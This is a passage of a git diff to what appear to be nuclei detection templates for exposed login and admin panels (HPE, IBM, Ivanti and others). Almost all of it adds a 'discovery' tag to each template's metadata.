a/http/exposed-panels/hpe-officeconnect-panel.yaml +++ b/http/exposed-panels/hpe-officeconnect-panel.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"HPE OfficeConnect" - tags: panel,hp,hpe,officeconnect,login + tags: panel,hp,hpe,officeconnect,login,discovery http: - raw: diff --git a/http/exposed-panels/hpe-system-management-login.yaml b/http/exposed-panels/hpe-system-management-login.yaml index de79d29e24c..1480f8fcfe8 100644 --- a/http/exposed-panels/hpe-system-management-login.yaml +++ b/http/exposed-panels/hpe-system-management-login.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: hpe,tech,panel + tags: hpe,tech,panel,discovery http: - method: GET diff --git a/http/exposed-panels/httpbin-panel.yaml b/http/exposed-panels/httpbin-panel.yaml index bdf38cfe98e..2fa45531d4e 100644 --- a/http/exposed-panels/httpbin-panel.yaml +++ b/http/exposed-panels/httpbin-panel.yaml @@ -13,7 +13,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"httpbin.org" - tags: panel,httpbin,oss + tags: panel,httpbin,oss,discovery http: - method: GET diff --git a/http/exposed-panels/huawei-hg532e-panel.yaml b/http/exposed-panels/huawei-hg532e-panel.yaml index b70fa3079b0..4f56e349034 100644 --- a/http/exposed-panels/huawei-hg532e-panel.yaml +++ b/http/exposed-panels/huawei-hg532e-panel.yaml @@ -17,7 +17,7 @@ info: shodan-query: http.html:"HG532e" product: hg532e vendor: huawei - tags: huawei,panel + tags: huawei,panel,discovery http: - method: GET diff --git a/http/exposed-panels/huawei-holosense-panel.yaml b/http/exposed-panels/huawei-holosense-panel.yaml index 9064d29c8b5..a01d2e2e763 100644 --- a/http/exposed-panels/huawei-holosense-panel.yaml +++ b/http/exposed-panels/huawei-holosense-panel.yaml @@ -18,7 +18,7 @@ info: fofa-query: - '"Server: SDC Server" && protocol="https"' - '"Server: WebServer/1.0.0" && port="1443"' - tags: panel,detect,huawei,holosens,iot + tags: panel,detect,huawei,holosens,iot,discovery flow: http(1) && http(2) && http(3) diff --git a/http/exposed-panels/huginn-panel.yaml b/http/exposed-panels/huginn-panel.yaml index 1f820b866cb..87b65554dc7 100644 --- a/http/exposed-panels/huginn-panel.yaml +++ b/http/exposed-panels/huginn-panel.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: true shodan-query: http.favicon.hash:-1951475503 - tags: panel,huginn,login + tags: panel,huginn,login,discovery http: - method: GET diff --git a/http/exposed-panels/huly-panel.yaml b/http/exposed-panels/huly-panel.yaml index 7cf2dea507e..7d80aafe53d 100644 --- a/http/exposed-panels/huly-panel.yaml +++ b/http/exposed-panels/huly-panel.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"Huly" - tags: panel,huly,login + tags: panel,huly,login,discovery http: - method: GET diff --git a/http/exposed-panels/hybris-administration-console.yaml b/http/exposed-panels/hybris-administration-console.yaml index efda2d29bd1..e8adf61fe73 100644 --- a/http/exposed-panels/hybris-administration-console.yaml +++ b/http/exposed-panels/hybris-administration-console.yaml @@ -19,7 +19,7 @@ info: - http.title:"hybris" fofa-query: title="hybris" google-query: intitle:"hybris" - tags: panel,hybris,sap + tags: panel,hybris,sap,discovery http: - method: GET diff --git a/http/exposed-panels/hydra-dashboard.yaml b/http/exposed-panels/hydra-dashboard.yaml index cbfdf48bd42..d68abfcb5a4 100644 --- a/http/exposed-panels/hydra-dashboard.yaml +++ b/http/exposed-panels/hydra-dashboard.yaml @@ -19,7 +19,7 @@ info: - http.title:"hydra router dashboard" fofa-query: title="hydra router dashboard" google-query: intitle:"hydra router dashboard" - tags: panel,exposure,hydra,hydra_project + tags: panel,exposure,hydra,hydra_project,discovery http: - method: GET diff --git a/http/exposed-panels/hyperdx-panel.yaml b/http/exposed-panels/hyperdx-panel.yaml index 7a99f00c55f..a26c0d4bcc7 100644 --- a/http/exposed-panels/hyperdx-panel.yaml +++ b/http/exposed-panels/hyperdx-panel.yaml @@ -1,37 +1,37 @@ -id: hyperdx-panel - -info: - name: HyperDX Panel - Detect - author: righettod - severity: info - description: | - HyperDX panel was discovered. - reference: - - https://github.com/hyperdxio/hyperdx - - https://www.hyperdx.io/ - metadata: - max-request: 1 - verified: true - shodan-query: html:"hyperdx" - tags: panel,hyperdx,detect - -http: - - method: GET - path: - - "{{BaseURL}}/search" - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains_any(to_lower(body), ">hyperdx</span>", ">loading hyperdx<")' - condition: and - - extractors: - - type: regex - part: body - group: 1 - regex: - +id: hyperdx-panel + +info: + name: HyperDX Panel - Detect + author: righettod + severity: info + description: | + HyperDX panel was discovered. + reference: + - https://github.com/hyperdxio/hyperdx + - https://www.hyperdx.io/ + metadata: + max-request: 1 + verified: true + shodan-query: html:"hyperdx" + tags: panel,hyperdx,detect,discovery + +http: + - method: GET + path: + - "{{BaseURL}}/search" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), ">hyperdx</span>", ">loading hyperdx<")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)"version":"([0-9.]+)"' # digest: 4a0a0047304502204bbe1cce13a72583a51157208c8c429f4cccdb797accecf18c0c5aea7282ac0f0221009025c88b4d110df0309c45802f2388b1561da28a8c6d831c578e9d56c786342e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/hyperplanning-panel.yaml b/http/exposed-panels/hyperplanning-panel.yaml index d31464f0b5b..58dfab229df 100644 --- a/http/exposed-panels/hyperplanning-panel.yaml +++ b/http/exposed-panels/hyperplanning-panel.yaml @@ -1,36 +1,36 @@ -id: hyperplanning-panel - -info: - name: HYPERPLANNING Login Panel - Detect - author: righettod - severity: info - description: | - HYPERPLANNING products was detected. - reference: - - https://www.index-education.com/fr/presentation-hyperplanning.php - metadata: - max-request: 1 - shodan-query: http.title:"HYPERPLANNING" - tags: panel,hyperplanning,login,detect - -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains_any(to_lower(body), "hyperplanning", "content=\"hyperplanning\"")' - condition: and - - extractors: - - type: regex - part: header - group: 1 - regex: +id: hyperplanning-panel + +info: + name: HYPERPLANNING Login Panel - Detect + author: righettod + severity: info + description: | + HYPERPLANNING products was detected. + reference: + - https://www.index-education.com/fr/presentation-hyperplanning.php + metadata: + max-request: 1 + shodan-query: http.title:"HYPERPLANNING" + tags: panel,hyperplanning,login,detect,discovery + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "hyperplanning", "content=\"hyperplanning\"")' + condition: and + + extractors: + - type: regex + part: header + group: 1 + regex: - '(?i)Server:\s+HYPERPLANNING\s+([0-9.\s\-]+)' # digest: 4a0a0047304502206e1ad0411dac80e4c7e944b40e426da8b8f20c1975582dab3dbc573b4c386524022100a986705143dadb743f6e8c3f3fa20fe9d48c222af1d450d54bc6a97a475690cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/hypertest-dashboard.yaml b/http/exposed-panels/hypertest-dashboard.yaml index f798e5e42d9..97556bcb347 100644 --- a/http/exposed-panels/hypertest-dashboard.yaml +++ b/http/exposed-panels/hypertest-dashboard.yaml @@ -15,7 +15,7 @@ info: verified: true max-request: 1 shodan-query: title:"HyperTest" - tags: panel,exposure,hypertest + tags: panel,exposure,hypertest,discovery http: - method: GET diff --git a/http/exposed-panels/i-librarian-panel.yaml b/http/exposed-panels/i-librarian-panel.yaml index 09a2b692432..5ce1d559276 100644 --- a/http/exposed-panels/i-librarian-panel.yaml +++ b/http/exposed-panels/i-librarian-panel.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 fofa-query: "I, Librarian" - tags: panel,login,i-librarian,detect + tags: panel,login,i-librarian,detect,discovery http: - method: GET diff --git a/http/exposed-panels/i-mscp-panel.yaml b/http/exposed-panels/i-mscp-panel.yaml index 5f266b4e29f..c8e6a346073 100644 --- a/http/exposed-panels/i-mscp-panel.yaml +++ b/http/exposed-panels/i-mscp-panel.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: title:"i-MSCP - Multi Server Control Panel" - tags: panel,i-mscp,detect + tags: panel,i-mscp,detect,discovery http: - method: GET diff --git a/http/exposed-panels/ibm-openadmin-panel.yaml b/http/exposed-panels/ibm-openadmin-panel.yaml index ac6b28eff6d..ff0c17e350a 100644 --- a/http/exposed-panels/ibm-openadmin-panel.yaml +++ b/http/exposed-panels/ibm-openadmin-panel.yaml @@ -8,7 +8,7 @@ info: verified: "true" max-request: 1 shodan-query: http.favicon.hash:965982073 - tags: openadmin,login,panel + tags: openadmin,login,panel,discovery http: - method: GET diff --git a/http/exposed-panels/ibm/ibm-advanced-system-management.yaml b/http/exposed-panels/ibm/ibm-advanced-system-management.yaml index b54ccb02249..38ed6299522 100644 --- a/http/exposed-panels/ibm/ibm-advanced-system-management.yaml +++ b/http/exposed-panels/ibm/ibm-advanced-system-management.yaml @@ -15,7 +15,7 @@ info: verified: true shodan-query: title:"Advanced System Management" fofa-query: title="Advanced System Management" - tags: panel,ibm,login,detect + tags: panel,ibm,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/ibm/ibm-api-connect-panel.yaml b/http/exposed-panels/ibm/ibm-api-connect-panel.yaml index 80fc0f336ae..adae96cc620 100644 --- a/http/exposed-panels/ibm/ibm-api-connect-panel.yaml +++ b/http/exposed-panels/ibm/ibm-api-connect-panel.yaml @@ -9,7 +9,7 @@ info: - https://www.ibm.com/products/api-connect/developer-portal metadata: max-request: 1 - tags: panel,ibm,api,detect,login + tags: panel,ibm,api,detect,login,discovery http: - method: GET diff --git a/http/exposed-panels/ibm/ibm-dcec-panel.yaml b/http/exposed-panels/ibm/ibm-dcec-panel.yaml index f6928b7e51c..cec4aa733ed 100644 --- a/http/exposed-panels/ibm/ibm-dcec-panel.yaml +++ b/http/exposed-panels/ibm/ibm-dcec-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"Decision Center Enterprise console" - tags: panel,ibm,login,detect,decision-center + tags: panel,ibm,login,detect,decision-center,discovery http: - method: GET diff --git a/http/exposed-panels/ibm/ibm-decision-server-console.yaml b/http/exposed-panels/ibm/ibm-decision-server-console.yaml index dd3730b6e00..0288b751178 100644 --- a/http/exposed-panels/ibm/ibm-decision-server-console.yaml +++ b/http/exposed-panels/ibm/ibm-decision-server-console.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"Rule Execution Server" - tags: panel,ibm,login,detect,decision-server + tags: panel,ibm,login,detect,decision-server,discovery http: - method: GET diff --git a/http/exposed-panels/ibm/ibm-maximo-login.yaml b/http/exposed-panels/ibm/ibm-maximo-login.yaml index d9020d4bb83..bf25ca093db 100644 --- a/http/exposed-panels/ibm/ibm-maximo-login.yaml +++ b/http/exposed-panels/ibm/ibm-maximo-login.yaml @@ -19,7 +19,7 @@ info: product: maximo_asset_management shodan-query: http.favicon.hash:-399298961 fofa-query: icon_hash=-399298961 - tags: maximo,panel,ibm,login,detect + tags: maximo,panel,ibm,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/ibm/ibm-mqseries-web-console.yaml b/http/exposed-panels/ibm/ibm-mqseries-web-console.yaml index 5f7d5c9ee71..88ad2909212 100644 --- a/http/exposed-panels/ibm/ibm-mqseries-web-console.yaml +++ b/http/exposed-panels/ibm/ibm-mqseries-web-console.yaml @@ -15,7 +15,7 @@ info: max-request: 1 vendor: ibm product: mq - tags: panel,ibm + tags: panel,ibm,discovery http: - method: GET diff --git a/http/exposed-panels/ibm/ibm-note-login.yaml b/http/exposed-panels/ibm/ibm-note-login.yaml index ce09dd93fc4..81404920423 100644 --- a/http/exposed-panels/ibm/ibm-note-login.yaml +++ b/http/exposed-panels/ibm/ibm-note-login.yaml @@ -16,7 +16,7 @@ info: vendor: ibm shodan-query: http.title:"IBM iNotes Login" product: inotes - tags: ibm,edb,panel,login,detect + tags: ibm,edb,panel,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/ibm/ibm-odm-panel.yaml b/http/exposed-panels/ibm/ibm-odm-panel.yaml index ed464083819..2e471532878 100644 --- a/http/exposed-panels/ibm/ibm-odm-panel.yaml +++ b/http/exposed-panels/ibm/ibm-odm-panel.yaml @@ -18,7 +18,7 @@ info: product: operational_decision_manager shodan-query: http.title:"Decision Center | Business Console" fofa-query: title="Decision Center | Business Console" - tags: panel,ibm,login,detect,decision-center + tags: panel,ibm,login,detect,decision-center,discovery http: - method: GET diff --git a/http/exposed-panels/ibm/ibm-security-access-manager.yaml b/http/exposed-panels/ibm/ibm-security-access-manager.yaml index ded0e1ba0fe..ab06097d243 100644 --- a/http/exposed-panels/ibm/ibm-security-access-manager.yaml +++ b/http/exposed-panels/ibm/ibm-security-access-manager.yaml @@ -16,7 +16,7 @@ info: vendor: ibm shodan-query: http.title:"IBM Security Access Manager" product: security_access_manager - tags: panel,ibm,login,detect + tags: panel,ibm,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/ibm/ibm-security-verify-panel.yaml b/http/exposed-panels/ibm/ibm-security-verify-panel.yaml index 92fe3b61fdc..24267798979 100644 --- a/http/exposed-panels/ibm/ibm-security-verify-panel.yaml +++ b/http/exposed-panels/ibm/ibm-security-verify-panel.yaml @@ -12,7 +12,7 @@ info: max-request: 1 vendor: ibm shodan-query: http.title:"IBM Security Verify Access" - tags: panel,ibm,login,detect + tags: panel,ibm,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/ibm/ibm-service-assistant.yaml b/http/exposed-panels/ibm/ibm-service-assistant.yaml index 0070c587f66..c2ccdd39bab 100644 --- a/http/exposed-panels/ibm/ibm-service-assistant.yaml +++ b/http/exposed-panels/ibm/ibm-service-assistant.yaml @@ -13,7 +13,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Welcome to Service Assistant" - tags: panel,ibm,service,login,detect + tags: panel,ibm,service,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/ibm/ibm-websphere-admin-panel.yaml b/http/exposed-panels/ibm/ibm-websphere-admin-panel.yaml index 81ace22e950..fecdd099fc2 100644 --- a/http/exposed-panels/ibm/ibm-websphere-admin-panel.yaml +++ b/http/exposed-panels/ibm/ibm-websphere-admin-panel.yaml @@ -18,7 +18,7 @@ info: product: websphere_application_server shodan-query: http.favicon.hash:1337147129 fofa-query: icon_hash=1337147129 - tags: websphere,panel,ibm + tags: websphere,panel,ibm,discovery http: - method: GET diff --git a/http/exposed-panels/ibm/ibm-websphere-panel.yaml b/http/exposed-panels/ibm/ibm-websphere-panel.yaml index 28ed1b1dc44..f7df1a99bc9 100644 --- a/http/exposed-panels/ibm/ibm-websphere-panel.yaml +++ b/http/exposed-panels/ibm/ibm-websphere-panel.yaml @@ -18,7 +18,7 @@ info: - http.html:"ibm websphere portal" - cpe:"cpe:2.3:a:ibm:websphere_portal" fofa-query: body="ibm websphere portal" - tags: ibm,websphere,panel + tags: ibm,websphere,panel,discovery http: - method: GET diff --git a/http/exposed-panels/icc-pro-login.yaml b/http/exposed-panels/icc-pro-login.yaml index d2a3f068d1e..be32c23ba50 100644 --- a/http/exposed-panels/icc-pro-login.yaml +++ b/http/exposed-panels/icc-pro-login.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: title:"Login to ICC PRO system" - tags: panel,icc-pro,edb + tags: panel,icc-pro,edb,discovery http: - method: GET diff --git a/http/exposed-panels/ice-hrm-panel.yaml b/http/exposed-panels/ice-hrm-panel.yaml index 404a8443ff8..b9ee13826e9 100644 --- a/http/exposed-panels/ice-hrm-panel.yaml +++ b/http/exposed-panels/ice-hrm-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Ice Hrm Login" - tags: icehrm,login,hrm,panel,web,detect + tags: icehrm,login,hrm,panel,web,detect,discovery http: - method: GET diff --git a/http/exposed-panels/icewarp-panel-detect.yaml b/http/exposed-panels/icewarp-panel-detect.yaml index d7c18520e2f..5175c4f025c 100644 --- a/http/exposed-panels/icewarp-panel-detect.yaml +++ b/http/exposed-panels/icewarp-panel-detect.yaml @@ -19,7 +19,7 @@ info: - http.title:"icewarp" fofa-query: title="icewarp" google-query: intitle:"icewarp" - tags: icewarp,panel + tags: icewarp,panel,discovery http: - method: GET diff --git a/http/exposed-panels/icinga-web-login.yaml b/http/exposed-panels/icinga-web-login.yaml index 00fcfa8ef3d..c3406eabac0 100644 --- a/http/exposed-panels/icinga-web-login.yaml +++ b/http/exposed-panels/icinga-web-login.yaml @@ -23,7 +23,7 @@ info: google-query: - intitle:"icinga web 2 login" - intitle:"icinga" - tags: panel,icinga + tags: panel,icinga,discovery http: - method: GET diff --git a/http/exposed-panels/iclock-admin-panel.yaml b/http/exposed-panels/iclock-admin-panel.yaml index 5061c3d196e..5953cbf3986 100644 --- a/http/exposed-panels/iclock-admin-panel.yaml +++ b/http/exposed-panels/iclock-admin-panel.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 2 shodan-query: html:"iClock Automatic" - tags: panel,iclock,login,admin + tags: panel,iclock,login,admin,discovery http: - method: GET diff --git a/http/exposed-panels/ictbroadcast-panel.yaml b/http/exposed-panels/ictbroadcast-panel.yaml index eb415c73544..be76a6849ae 100644 --- a/http/exposed-panels/ictbroadcast-panel.yaml +++ b/http/exposed-panels/ictbroadcast-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-60395993 - tags: panel,ictbroadcast,login + tags: panel,ictbroadcast,login,discovery http: - method: GET diff --git a/http/exposed-panels/ictprotege-login-panel.yaml b/http/exposed-panels/ictprotege-login-panel.yaml index ff616c4472d..b94e80b4e3e 100644 --- a/http/exposed-panels/ictprotege-login-panel.yaml +++ b/http/exposed-panels/ictprotege-login-panel.yaml @@ -18,7 +18,7 @@ info: - http.title:"ict protege wx®" fofa-query: title="ict protege wx®" google-query: intitle:"ict protege wx®" - tags: panel,ictprotege,ict + tags: panel,ictprotege,ict,discovery http: - method: GET diff --git a/http/exposed-panels/identity-services-engine.yaml b/http/exposed-panels/identity-services-engine.yaml index 47a556725a3..f41019cf61d 100644 --- a/http/exposed-panels/identity-services-engine.yaml +++ b/http/exposed-panels/identity-services-engine.yaml @@ -18,7 +18,7 @@ info: - http.title:"identity services engine" fofa-query: title="identity services engine" google-query: intitle:"identity services engine" - tags: panel,cisco + tags: panel,cisco,discovery http: - method: GET diff --git a/http/exposed-panels/ilch-admin-panel.yaml b/http/exposed-panels/ilch-admin-panel.yaml index dded0a137ee..4003b41e7a6 100644 --- a/http/exposed-panels/ilch-admin-panel.yaml +++ b/http/exposed-panels/ilch-admin-panel.yaml @@ -19,7 +19,7 @@ info: - http.title:"ilch" fofa-query: title="ilch" google-query: intitle:"ilch" - tags: panel,ilch,cms + tags: panel,ilch,cms,discovery http: - method: GET diff --git a/http/exposed-panels/ilias-panel.yaml b/http/exposed-panels/ilias-panel.yaml index 9ce8b8733c7..563085710d6 100644 --- a/http/exposed-panels/ilias-panel.yaml +++ b/http/exposed-panels/ilias-panel.yaml @@ -18,7 +18,7 @@ info: - http.html:"ILIAS" - http.html:"ilias" fofa-query: body="ilias" - tags: panel,ilias + tags: panel,ilias,discovery http: - method: GET diff --git a/http/exposed-panels/immich-panel.yaml b/http/exposed-panels/immich-panel.yaml index 173668dcf10..c40ffa05a68 100644 --- a/http/exposed-panels/immich-panel.yaml +++ b/http/exposed-panels/immich-panel.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-43504595 - tags: panel,immich,detect + tags: panel,immich,detect,discovery http: - method: GET diff --git a/http/exposed-panels/incapptic-connect-panel.yaml b/http/exposed-panels/incapptic-connect-panel.yaml index 7728077289f..1205fd5ad38 100644 --- a/http/exposed-panels/incapptic-connect-panel.yaml +++ b/http/exposed-panels/incapptic-connect-panel.yaml @@ -22,7 +22,7 @@ info: - icon_hash=-1067582922 - title="incapptic" google-query: intitle:"incapptic" - tags: panel,ivanti,incapptic-connect + tags: panel,ivanti,incapptic-connect,discovery http: - method: GET diff --git a/http/exposed-panels/influxdb-panel.yaml b/http/exposed-panels/influxdb-panel.yaml index 51f5b492076..e1f63b76d79 100644 --- a/http/exposed-panels/influxdb-panel.yaml +++ b/http/exposed-panels/influxdb-panel.yaml @@ -21,7 +21,7 @@ info: - influxdb fofa-query: title="influxdb - admin interface" google-query: intitle:"influxdb - admin interface" - tags: panel,influxdb,influxdata + tags: panel,influxdb,influxdata,discovery http: - method: GET diff --git a/http/exposed-panels/infoblox-nios-panel.yaml b/http/exposed-panels/infoblox-nios-panel.yaml index fa3968333bb..597b6aac81b 100644 --- a/http/exposed-panels/infoblox-nios-panel.yaml +++ b/http/exposed-panels/infoblox-nios-panel.yaml @@ -17,7 +17,7 @@ info: vendor: infoblox product: nios shodan-query: http.title:"Infoblox" - tags: panel,infoblox,nios,login,detect + tags: panel,infoblox,nios,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/intelbras-login.yaml b/http/exposed-panels/intelbras-login.yaml index f5f7ef5966b..1d3f8004a27 100644 --- a/http/exposed-panels/intelbras-login.yaml +++ b/http/exposed-panels/intelbras-login.yaml @@ -17,7 +17,7 @@ info: google-query: intitle:"Intelbras" "All Rights Reserved" -.com product: iwr_3000n vendor: intelbras - tags: panel,edb + tags: panel,edb,discovery http: - method: GET diff --git a/http/exposed-panels/intelbras-panel.yaml b/http/exposed-panels/intelbras-panel.yaml index 8be1efb9fd8..2ab15138257 100644 --- a/http/exposed-panels/intelbras-panel.yaml +++ b/http/exposed-panels/intelbras-panel.yaml @@ -22,7 +22,7 @@ info: - title="intelbras" - app="intelbras" google-query: intitle:"intelbras" - tags: panel,intelbras + tags: panel,intelbras,discovery http: - method: GET diff --git a/http/exposed-panels/intellian-aptus-panel.yaml b/http/exposed-panels/intellian-aptus-panel.yaml index ebaaaf24650..9809aa9c87d 100644 --- a/http/exposed-panels/intellian-aptus-panel.yaml +++ b/http/exposed-panels/intellian-aptus-panel.yaml @@ -18,7 +18,7 @@ info: - http.title:"intellian aptus web" fofa-query: title="intellian aptus web" google-query: intitle:"intellian aptus web" - tags: panel,intellian,aptus,intelliantech + tags: panel,intellian,aptus,intelliantech,discovery http: - method: GET diff --git a/http/exposed-panels/intelliflash-login-panel.yaml b/http/exposed-panels/intelliflash-login-panel.yaml index 5c2fdebc7b9..c5438a93591 100644 --- a/http/exposed-panels/intelliflash-login-panel.yaml +++ b/http/exposed-panels/intelliflash-login-panel.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,intelliflash + tags: panel,intelliflash,discovery http: - method: GET diff --git a/http/exposed-panels/interactsoftware-interact.yaml b/http/exposed-panels/interactsoftware-interact.yaml index 538ed206f4f..00b963642ee 100644 --- a/http/exposed-panels/interactsoftware-interact.yaml +++ b/http/exposed-panels/interactsoftware-interact.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: panel,interactsoftware,interact,detect + tags: panel,interactsoftware,interact,detect,discovery http: - method: GET diff --git a/http/exposed-panels/iomega-emc-shared-nas.yaml b/http/exposed-panels/iomega-emc-shared-nas.yaml index d148fcde5e3..8f8cc7d0c3a 100644 --- a/http/exposed-panels/iomega-emc-shared-nas.yaml +++ b/http/exposed-panels/iomega-emc-shared-nas.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel + tags: panel,discovery http: - method: GET diff --git a/http/exposed-panels/ipdiva-mediation-panel.yaml b/http/exposed-panels/ipdiva-mediation-panel.yaml index 7b265a48374..af19bccc067 100644 --- a/http/exposed-panels/ipdiva-mediation-panel.yaml +++ b/http/exposed-panels/ipdiva-mediation-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 3 shodan-query: http.html:"IPdiva" - tags: panel,ipdiva,mediation + tags: panel,ipdiva,mediation,discovery http: - method: GET diff --git a/http/exposed-panels/iptime-router.yaml b/http/exposed-panels/iptime-router.yaml index ef3bb669c3a..358df202f2f 100644 --- a/http/exposed-panels/iptime-router.yaml +++ b/http/exposed-panels/iptime-router.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,login,iptime,router + tags: panel,login,iptime,router,discovery http: - method: GET diff --git a/http/exposed-panels/irisnext-panel.yaml b/http/exposed-panels/irisnext-panel.yaml index 0b3a2317e6f..3639633d429 100644 --- a/http/exposed-panels/irisnext-panel.yaml +++ b/http/exposed-panels/irisnext-panel.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"irisnext" - tags: panel,irisnext,login + tags: panel,irisnext,login,discovery http: - method: GET diff --git a/http/exposed-panels/isams-panel.yaml b/http/exposed-panels/isams-panel.yaml index 4c5103eebb7..50e39065a3b 100644 --- a/http/exposed-panels/isams-panel.yaml +++ b/http/exposed-panels/isams-panel.yaml @@ -16,7 +16,7 @@ info: vendor: iris product: isams shodan-query: http.favicon.hash:-81573405 - tags: panel,isams,login + tags: panel,isams,login,discovery http: - method: GET diff --git a/http/exposed-panels/issabel-login.yaml b/http/exposed-panels/issabel-login.yaml index f7450aa0aff..f5186916a8e 100644 --- a/http/exposed-panels/issabel-login.yaml +++ b/http/exposed-panels/issabel-login.yaml @@ -14,7 +14,7 @@ info: fofa-query: title="Issabel" product: pbx vendor: issabel - tags: issabel,panel + tags: issabel,panel,discovery http: - method: GET diff --git a/http/exposed-panels/istat-panel-detect.yaml b/http/exposed-panels/istat-panel-detect.yaml index 2bb323307e6..fd137df9bf0 100644 --- a/http/exposed-panels/istat-panel-detect.yaml +++ b/http/exposed-panels/istat-panel-detect.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,abbott,istat + tags: panel,abbott,istat,discovery http: - method: GET diff --git a/http/exposed-panels/itop-panel.yaml b/http/exposed-panels/itop-panel.yaml index 82cad734f72..24c0810fc8a 100644 --- a/http/exposed-panels/itop-panel.yaml +++ b/http/exposed-panels/itop-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 2 vendor: combodo product: itop - tags: panel,itop,combodo + tags: panel,itop,combodo,discovery http: - method: GET diff --git a/http/exposed-panels/ivanti-connect-secure-panel.yaml b/http/exposed-panels/ivanti-connect-secure-panel.yaml index fde2815bca7..7dc1b44857c 100644 --- a/http/exposed-panels/ivanti-connect-secure-panel.yaml +++ b/http/exposed-panels/ivanti-connect-secure-panel.yaml @@ -23,7 +23,7 @@ info: - title="ivanti connect secure" - body="welcome.cgi?p=logo" google-query: intitle:"ivanti connect secure" - tags: panel,connectsecure,login,ivanti + tags: panel,connectsecure,login,ivanti,discovery http: - method: GET diff --git a/http/exposed-panels/ivanti-csa-panel.yaml b/http/exposed-panels/ivanti-csa-panel.yaml index 1bd6abd8a6b..209cc86a54e 100644 --- a/http/exposed-panels/ivanti-csa-panel.yaml +++ b/http/exposed-panels/ivanti-csa-panel.yaml @@ -1,32 +1,32 @@ -id: ivanti-csa-panel - -info: - name: Ivanti(R) Cloud Services Appliance - Panel - author: rxerium - severity: info - description: | - An Ivanti Cloud Services Appliance panel was detected. - reference: - - https://help.ivanti.com/ld/help/en_US/LDMS/10.0/Windows/csa-h-help.htm - metadata: - verified: true - max-request: 1 - shodan-query: title:"Cloud Services Appliance" - tags: ivanti,csa,panel,login - -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Ivanti(R) Cloud Services Appliance" - - - type: status - status: +id: ivanti-csa-panel + +info: + name: Ivanti(R) Cloud Services Appliance - Panel + author: rxerium + severity: info + description: | + An Ivanti Cloud Services Appliance panel was detected. + reference: + - https://help.ivanti.com/ld/help/en_US/LDMS/10.0/Windows/csa-h-help.htm + metadata: + verified: true + max-request: 1 + shodan-query: title:"Cloud Services Appliance" + tags: ivanti,csa,panel,login,discovery + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Ivanti(R) Cloud Services Appliance" + + - type: status + status: - 200 # digest: 4a0a00473045022100e283c40b9ce63022f7df72a847be76a9e207911dfad972f166fde14fa1628188022006c89720a3a7cdbec65ebb750f9eaa4c5a806ed064020e0723fb649579dc6a05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/ivanti-traffic-manager-panel.yaml b/http/exposed-panels/ivanti-traffic-manager-panel.yaml index cf987836cc7..020c52b4f30 100644 --- a/http/exposed-panels/ivanti-traffic-manager-panel.yaml +++ b/http/exposed-panels/ivanti-traffic-manager-panel.yaml @@ -1,32 +1,32 @@ -id: ivanti-traffic-manager-panel - -info: - name: Ivanti Traffic Manager Panel - Detect - author: rxerium - severity: info - description: | - An Ivanti Traffic Manager Login Panel was detected. - reference: - - https://www.ivanti.com/resources/v/doc/ivi/2528/2ef03e8ed03d - metadata: - verified: true - max-request: 1 - shodan-query: http.html:"Login (Virtual Traffic Manager" - tags: detect,traffic-manager,panel,login - -http: - - method: GET - path: - - "{{BaseURL}}/apps/zxtm/login.cgi" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Login (Virtual Traffic Manager" - - - type: status - status: +id: ivanti-traffic-manager-panel + +info: + name: Ivanti Traffic Manager Panel - Detect + author: rxerium + severity: info + description: | + An Ivanti Traffic Manager Login Panel was detected. + reference: + - https://www.ivanti.com/resources/v/doc/ivi/2528/2ef03e8ed03d + metadata: + verified: true + max-request: 1 + 